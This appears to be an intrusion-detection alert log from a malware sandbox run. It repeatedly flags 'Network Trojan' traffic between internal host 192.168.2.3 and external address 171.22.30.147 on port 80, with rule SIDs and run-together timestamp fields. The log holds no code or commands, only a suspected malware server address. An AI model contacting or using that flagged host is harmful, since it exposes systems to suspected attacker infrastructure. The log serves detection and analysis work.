            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497902025483 01/05/23-08:52:38.427307
            SID:2025483
            Source Port:80
            Destination Port:49790
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749808802021641 01/05/23-08:52:43.325468
            SID:2021641
            Source Port:49808
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749940802024313 01/05/23-08:53:21.893765
            SID:2024313
            Source Port:49940
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749744802024318 01/05/23-08:52:23.736699
            SID:2024318
            Source Port:49744
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750072802024313 01/05/23-08:54:00.683642
            SID:2024313
            Source Port:50072
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749744802024313 01/05/23-08:52:23.736699
            SID:2024313
            Source Port:49744
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749800802025381 01/05/23-08:52:41.099242
            SID:2025381
            Source Port:49800
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749862802024313 01/05/23-08:52:59.436708
            SID:2024313
            Source Port:49862
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749897802021641 01/05/23-08:53:09.055046
            SID:2021641
            Source Port:49897
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749957802024318 01/05/23-08:53:26.768134
            SID:2024318
            Source Port:49957
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749958802825766 01/05/23-08:53:27.233105
            SID:2825766
            Source Port:49958
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749863802825766 01/05/23-08:52:59.703117
            SID:2825766
            Source Port:49863
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749862802024318 01/05/23-08:52:59.436708
            SID:2024318
            Source Port:49862
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749941802825766 01/05/23-08:53:22.165125
            SID:2825766
            Source Port:49941
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749945802024313 01/05/23-08:53:23.275014
            SID:2024313
            Source Port:49945
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749812802025381 01/05/23-08:52:44.412618
            SID:2025381
            Source Port:49812
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749985802024318 01/05/23-08:53:36.027311
            SID:2024318
            Source Port:49985
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749968802025381 01/05/23-08:53:31.490288
            SID:2025381
            Source Port:49968
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749757802825766 01/05/23-08:52:27.498112
            SID:2825766
            Source Port:49757
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749985802024313 01/05/23-08:53:36.027311
            SID:2024313
            Source Port:49985
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749801802024313 01/05/23-08:52:41.371912
            SID:2024313
            Source Port:49801
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749778802825766 01/05/23-08:52:34.958959
            SID:2825766
            Source Port:49778
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497302025483 01/05/23-08:52:19.930196
            SID:2025483
            Source Port:80
            Destination Port:49730
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749713802021641 01/05/23-08:52:12.826844
            SID:2021641
            Source Port:49713
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750041802021641 01/05/23-08:53:52.410718
            SID:2021641
            Source Port:50041
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497682025483 01/05/23-08:52:30.646820
            SID:2025483
            Source Port:80
            Destination Port:49768
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749718802021641 01/05/23-08:52:15.464089
            SID:2021641
            Source Port:49718
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749699802024312 01/05/23-08:52:06.870270
            SID:2024312
            Source Port:49699
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749917802024318 01/05/23-08:53:15.635846
            SID:2024318
            Source Port:49917
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497712025483 01/05/23-08:52:31.457724
            SID:2025483
            Source Port:80
            Destination Port:49771
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749996802025381 01/05/23-08:53:38.933239
            SID:2025381
            Source Port:49996
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750023802024318 01/05/23-08:53:47.546596
            SID:2024318
            Source Port:50023
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497382025483 01/05/23-08:52:22.148864
            SID:2025483
            Source Port:80
            Destination Port:49738
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749699802024317 01/05/23-08:52:06.870270
            SID:2024317
            Source Port:49699
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749917802024313 01/05/23-08:53:15.635846
            SID:2024313
            Source Port:49917
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497162025483 01/05/23-08:52:14.437339
            SID:2025483
            Source Port:80
            Destination Port:49716
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749913802825766 01/05/23-08:53:14.593137
            SID:2825766
            Source Port:49913
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750057802825766 01/05/23-08:53:56.743180
            SID:2825766
            Source Port:50057
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749729802825766 01/05/23-08:52:19.554519
            SID:2825766
            Source Port:49729
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749741802021641 01/05/23-08:52:22.916909
            SID:2021641
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749783802025381 01/05/23-08:52:36.372208
            SID:2025381
            Source Port:49783
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749801802024318 01/05/23-08:52:41.371912
            SID:2024318
            Source Port:49801
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500652025483 01/05/23-08:53:58.921375
            SID:2025483
            Source Port:80
            Destination Port:50065
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749838802025381 01/05/23-08:52:52.824149
            SID:2025381
            Source Port:49838
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749954802021641 01/05/23-08:53:25.726692
            SID:2021641
            Source Port:49954
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750079802021641 01/05/23-08:54:02.588823
            SID:2021641
            Source Port:50079
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749861802025381 01/05/23-08:52:59.149010
            SID:2025381
            Source Port:49861
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750006802025381 01/05/23-08:53:41.552586
            SID:2025381
            Source Port:50006
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749876802021641 01/05/23-08:53:03.175112
            SID:2021641
            Source Port:49876
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499852025483 01/05/23-08:53:36.104350
            SID:2025483
            Source Port:80
            Destination Port:49985
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500432025483 01/05/23-08:53:53.036023
            SID:2025483
            Source Port:80
            Destination Port:50043
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749780802825766 01/05/23-08:52:35.511333
            SID:2825766
            Source Port:49780
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749884802825766 01/05/23-08:53:05.293982
            SID:2825766
            Source Port:49884
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749875802825766 01/05/23-08:53:02.907470
            SID:2825766
            Source Port:49875
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499662025483 01/05/23-08:53:31.030517
            SID:2025483
            Source Port:80
            Destination Port:49966
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749827802024313 01/05/23-08:52:48.461129
            SID:2024313
            Source Port:49827
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499252025483 01/05/23-08:53:17.956704
            SID:2025483
            Source Port:80
            Destination Port:49925
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749847802825766 01/05/23-08:52:55.372015
            SID:2825766
            Source Port:49847
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749752802825766 01/05/23-08:52:26.039085
            SID:2825766
            Source Port:49752
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499222025483 01/05/23-08:53:17.153460
            SID:2025483
            Source Port:80
            Destination Port:49922
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749715802025381 01/05/23-08:52:14.021138
            SID:2025381
            Source Port:49715
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749706802025381 01/05/23-08:52:09.771973
            SID:2025381
            Source Port:49706
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750023802024313 01/05/23-08:53:47.546596
            SID:2024313
            Source Port:50023
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749918802825766 01/05/23-08:53:15.920283
            SID:2825766
            Source Port:49918
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497462025483 01/05/23-08:52:24.379899
            SID:2025483
            Source Port:80
            Destination Port:49746
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749874802024318 01/05/23-08:53:02.624496
            SID:2024318
            Source Port:49874
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749829802025381 01/05/23-08:52:49.001962
            SID:2025381
            Source Port:49829
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749874802024313 01/05/23-08:53:02.624496
            SID:2024313
            Source Port:49874
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749827802024318 01/05/23-08:52:48.461129
            SID:2024318
            Source Port:49827
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749732802024318 01/05/23-08:52:20.401546
            SID:2024318
            Source Port:49732
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750018802021641 01/05/23-08:53:44.999195
            SID:2021641
            Source Port:50018
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749899802025381 01/05/23-08:53:10.169881
            SID:2025381
            Source Port:49899
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749732802024313 01/05/23-08:52:20.401546
            SID:2024313
            Source Port:49732
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749945802024318 01/05/23-08:53:23.275014
            SID:2024318
            Source Port:49945
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749885802021641 01/05/23-08:53:05.575803
            SID:2021641
            Source Port:49885
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749734802025381 01/05/23-08:52:20.978367
            SID:2025381
            Source Port:49734
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749930802025381 01/05/23-08:53:19.220224
            SID:2025381
            Source Port:49930
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750048802025381 01/05/23-08:53:54.265201
            SID:2025381
            Source Port:50048
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749957802024313 01/05/23-08:53:26.768134
            SID:2024313
            Source Port:49957
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750053802021641 01/05/23-08:53:55.636070
            SID:2021641
            Source Port:50053
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497872025483 01/05/23-08:52:37.593230
            SID:2025483
            Source Port:80
            Destination Port:49787
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749716802024318 01/05/23-08:52:14.357533
            SID:2024318
            Source Port:49716
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749708802825766 01/05/23-08:52:10.789251
            SID:2825766
            Source Port:49708
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749717802825766 01/05/23-08:52:14.673219
            SID:2825766
            Source Port:49717
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497652025483 01/05/23-08:52:29.829156
            SID:2025483
            Source Port:80
            Destination Port:49765
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749890802024313 01/05/23-08:53:06.934564
            SID:2024313
            Source Port:49890
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750049802024313 01/05/23-08:53:54.543372
            SID:2024313
            Source Port:50049
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749701802021641 01/05/23-08:52:07.731855
            SID:2021641
            Source Port:49701
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749914802021641 01/05/23-08:53:14.852027
            SID:2021641
            Source Port:49914
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750049802024318 01/05/23-08:53:54.543372
            SID:2024318
            Source Port:50049
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749890802024318 01/05/23-08:53:06.934564
            SID:2024318
            Source Port:49890
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749901802825766 01/05/23-08:53:11.357263
            SID:2825766
            Source Port:49901
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749704802021641 01/05/23-08:52:08.934535
            SID:2021641
            Source Port:49704
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750069802825766 01/05/23-08:53:59.913079
            SID:2825766
            Source Port:50069
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749739802021641 01/05/23-08:52:22.339123
            SID:2021641
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749716802024313 01/05/23-08:52:14.357533
            SID:2024313
            Source Port:49716
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750040802825766 01/05/23-08:53:52.135869
            SID:2825766
            Source Port:50040
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750081802021641 01/05/23-08:54:03.233046
            SID:2021641
            Source Port:50081
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749888802021641 01/05/23-08:53:06.392338
            SID:2021641
            Source Port:49888
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749735802024318 01/05/23-08:52:21.259701
            SID:2024318
            Source Port:49735
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749871802024313 01/05/23-08:53:01.829225
            SID:2024313
            Source Port:49871
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749873802025381 01/05/23-08:53:02.352866
            SID:2025381
            Source Port:49873
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749942802021641 01/05/23-08:53:22.441601
            SID:2021641
            Source Port:49942
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750009802021641 01/05/23-08:53:42.368696
            SID:2021641
            Source Port:50009
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749826802025381 01/05/23-08:52:48.184567
            SID:2025381
            Source Port:49826
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749743802025381 01/05/23-08:52:23.467755
            SID:2025381
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749871802024318 01/05/23-08:53:01.829225
            SID:2024318
            Source Port:49871
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749956802025381 01/05/23-08:53:26.250117
            SID:2025381
            Source Port:49956
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749872802825766 01/05/23-08:53:02.084337
            SID:2825766
            Source Port:49872
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498512025483 01/05/23-08:52:56.520867
            SID:2025483
            Source Port:80
            Destination Port:49851
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500212025483 01/05/23-08:53:46.439893
            SID:2025483
            Source Port:80
            Destination Port:50021
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500272025483 01/05/23-08:53:48.680434
            SID:2025483
            Source Port:80
            Destination Port:50027
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749781802024313 01/05/23-08:52:35.821668
            SID:2024313
            Source Port:49781
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498182025483 01/05/23-08:52:46.103882
            SID:2025483
            Source Port:80
            Destination Port:49818
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749781802024318 01/05/23-08:52:35.821668
            SID:2024318
            Source Port:49781
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749887802825766 01/05/23-08:53:06.117016
            SID:2825766
            Source Port:49887
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749731802825766 01/05/23-08:52:20.113614
            SID:2825766
            Source Port:49731
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750046802025381 01/05/23-08:53:53.748051
            SID:2025381
            Source Port:50046
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749848802024313 01/05/23-08:52:55.640788
            SID:2024313
            Source Port:49848
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749826802825766 01/05/23-08:52:48.184567
            SID:2825766
            Source Port:49826
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749825802024318 01/05/23-08:52:47.903129
            SID:2024318
            Source Port:49825
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749844802825766 01/05/23-08:52:54.549139
            SID:2825766
            Source Port:49844
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749703802825766 01/05/23-08:52:08.565296
            SID:2825766
            Source Port:49703
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750066802825766 01/05/23-08:53:59.096230
            SID:2825766
            Source Port:50066
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750020802024318 01/05/23-08:53:45.631791
            SID:2024318
            Source Port:50020
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497192025483 01/05/23-08:52:15.922866
            SID:2025483
            Source Port:80
            Destination Port:49719
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749825802024313 01/05/23-08:52:47.903129
            SID:2024313
            Source Port:49825
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750020802024313 01/05/23-08:53:45.631791
            SID:2024313
            Source Port:50020
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497242025483 01/05/23-08:52:18.178959
            SID:2025483
            Source Port:80
            Destination Port:49724
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749852802025381 01/05/23-08:52:56.705137
            SID:2025381
            Source Port:49852
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749963802021641 01/05/23-08:53:30.141323
            SID:2021641
            Source Port:49963
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749767802021641 01/05/23-08:52:30.299348
            SID:2021641
            Source Port:49767
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749769802025381 01/05/23-08:52:30.825016
            SID:2025381
            Source Port:49769
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750074802025381 01/05/23-08:54:01.233569
            SID:2025381
            Source Port:50074
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749792802825766 01/05/23-08:52:38.887901
            SID:2825766
            Source Port:49792
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749870802025381 01/05/23-08:53:01.561418
            SID:2025381
            Source Port:49870
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499882025483 01/05/23-08:53:36.904163
            SID:2025483
            Source Port:80
            Destination Port:49988
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500592025483 01/05/23-08:53:57.366003
            SID:2025483
            Source Port:80
            Destination Port:50059
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499822025483 01/05/23-08:53:35.304712
            SID:2025483
            Source Port:80
            Destination Port:49982
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749947802025381 01/05/23-08:53:23.814636
            SID:2025381
            Source Port:49947
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749754802825766 01/05/23-08:52:26.655822
            SID:2825766
            Source Port:49754
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749916802025381 01/05/23-08:53:15.372296
            SID:2025381
            Source Port:49916
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749932802825766 01/05/23-08:53:19.762349
            SID:2825766
            Source Port:49932
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499382025483 01/05/23-08:53:21.462781
            SID:2025483
            Source Port:80
            Destination Port:49938
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750008802025381 01/05/23-08:53:42.094852
            SID:2025381
            Source Port:50008
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749904802825766 01/05/23-08:53:12.139251
            SID:2825766
            Source Port:49904
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750047802024318 01/05/23-08:53:54.007519
            SID:2024318
            Source Port:50047
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750048802825766 01/05/23-08:53:54.265201
            SID:2825766
            Source Port:50048
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498832025483 01/05/23-08:53:05.117912
            SID:2025483
            Source Port:80
            Destination Port:49883
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750050802021641 01/05/23-08:53:54.799294
            SID:2021641
            Source Port:50050
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749902802021641 01/05/23-08:53:11.610501
            SID:2021641
            Source Port:49902
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749919802025381 01/05/23-08:53:16.188265
            SID:2025381
            Source Port:49919
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749765802021641 01/05/23-08:52:29.748218
            SID:2021641
            Source Port:49765
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750069802025381 01/05/23-08:53:59.913079
            SID:2025381
            Source Port:50069
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497522025483 01/05/23-08:52:26.122774
            SID:2025483
            Source Port:80
            Destination Port:49752
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749905802021641 01/05/23-08:53:12.409052
            SID:2021641
            Source Port:49905
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750055802021641 01/05/23-08:53:56.183544
            SID:2021641
            Source Port:50055
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749753802024318 01/05/23-08:52:26.326305
            SID:2024318
            Source Port:49753
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
